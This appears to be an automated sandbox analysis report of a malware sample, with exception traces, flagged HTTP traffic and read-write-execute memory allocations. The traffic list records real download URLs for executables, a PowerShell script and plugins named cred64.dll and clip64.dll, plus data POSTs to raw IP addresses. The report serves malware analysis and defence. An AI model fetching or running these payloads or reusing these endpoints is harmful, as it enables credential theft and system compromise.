__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bb41a 0x74baff8 0x74b564d 0x74b45b5 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009224 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009232 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 42669008	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bb41a 0x74baff8 0x74b564d 0x74b45b5 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009224 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009232 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 44067200	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bb922 0x74bb548 0x74b5635 0x74b46a2 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009244 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009252 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 45465472	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bb922 0x74bb548 0x74b564d 0x74b46a2 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009244 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009252 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 47137744	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bb922 0x74bb548 0x74b564d 0x74b46a2 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009244 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009252 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 42086080	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bc8f7 0x74bc0c9 0x74b302c 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3010128 registers.edi: 3010408 registers.eax: 0 registers.ebp: 3010136 registers.edx: 0 registers.ebx: 3011884 registers.esi: 42653576 registers.ecx: 42660660	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://5.42.92.88/loghub/master
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.124.1/theme/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.52/fuza/2.ps1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.52/fuza/sus.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.52/fuza/foto2552.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.52/fuza/nalo.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.1/theme/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.1/theme/Plugins/clip64.dll

Performs some HTTP requests (50 out of 57 events)

request	POST http://5.42.92.88/loghub/master
request	POST http://77.91.124.1/theme/index.php
request	GET http://77.91.68.52/fuza/2.ps1
request	GET http://77.91.68.52/fuza/sus.exe
request	GET http://77.91.68.52/fuza/foto2552.exe
request	GET http://77.91.68.52/fuza/nalo.exe
request	GET http://77.91.124.1/theme/Plugins/cred64.dll
request	GET http://77.91.124.1/theme/Plugins/clip64.dll
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywqvzTXJCBjF9Krz5UewUtmNlhIo1BS8-fexhnyRwXiKcYoKisy5fbyeo0_7MMbPVvKQe3s
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyvqedP1KTGaespiPNNUuOOhhlNIWdRWejAZmR61I2VV-ku55l7L8gdnH1EC5fauuzoF1J2fA&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S504171679%3A1697417176414722
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/_/bscframe
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?QoZb0Q
request	GET https://www.google.com/favicon.ico
request	GET https://www.facebook.com/login
request	GET https://www.youtube.com/
request	GET https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/s3epWMBo1FX.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0,cross/u4xvA0Tw-4L.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/zDdQsF0sOjp.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/om552iOCRxJ.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/ye/l/0,cross/seCHURQhRK2.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/yI/r/4aAhOWlwaXf.svg
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0,cross/qz5m5ZNj4YA.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/v2fcQEWFLez.js?_nc_x=Ij3Wp8lg5Kz
request	GET https://fonts.googleapis.com/css?family=YouTube+Sans:500
request	GET https://fonts.googleapis.com/css?family=Roboto:400,500
request	GET https://www.youtube.com/img/desktop/supported_browsers/yt_logo_rgb_light.png
request	GET https://www.youtube.com/img/desktop/supported_browsers/dinosaur.png
request	GET https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxM.woff
request	GET https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc-.woff
request	GET https://www.youtube.com/img/desktop/supported_browsers/firefox.png
request	GET https://www.youtube.com/img/desktop/supported_browsers/opera.png
request	GET https://fonts.gstatic.com/s/youtubesans/v19/Qw3hZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3HMXfxQASluL2m_dANVawBpSF.woff
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyzBQFfM-zgimivF77SXFn_CtNlk_Zx-KTSJ1hmwlPAI3lcCA3Htt7SepazY5A750yWTYAOAag
request	GET https://facebook.com/security/hsts-pixel.gif?c=3.2.5
request	GET https://www.youtube.com/img/desktop/supported_browsers/chrome.png
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyz6pDefJyKshYFsDLzJUIYEkQBxjlzW7Psw7k8R--D2gwUfEF8gBSj8fOPfztqQKz1zgy7RqQ&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-419032450%3A1697417189597662
request	GET https://www.youtube.com/img/desktop/supported_browsers/edgium.png
request	GET https://www.youtube.com/favicon.ico
request	GET https://fbcdn.net/security/hsts-pixel.gif?c=2.5
request	GET https://fbsbx.com/security/hsts-pixel.gif?c=5
request	GET https://connect.facebook.net/security/hsts-pixel.gif
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

Sends data using the HTTP POST Method (2 events)

request	POST http://5.42.92.88/loghub/master
request	POST http://77.91.124.1/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 3369 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 1460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 1460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 1720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 1720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bb65000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00740000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e9b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0074c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c8a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00757000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70751000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74711000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0074a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c0f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73be1000 process_handle: 0xffffffff	1
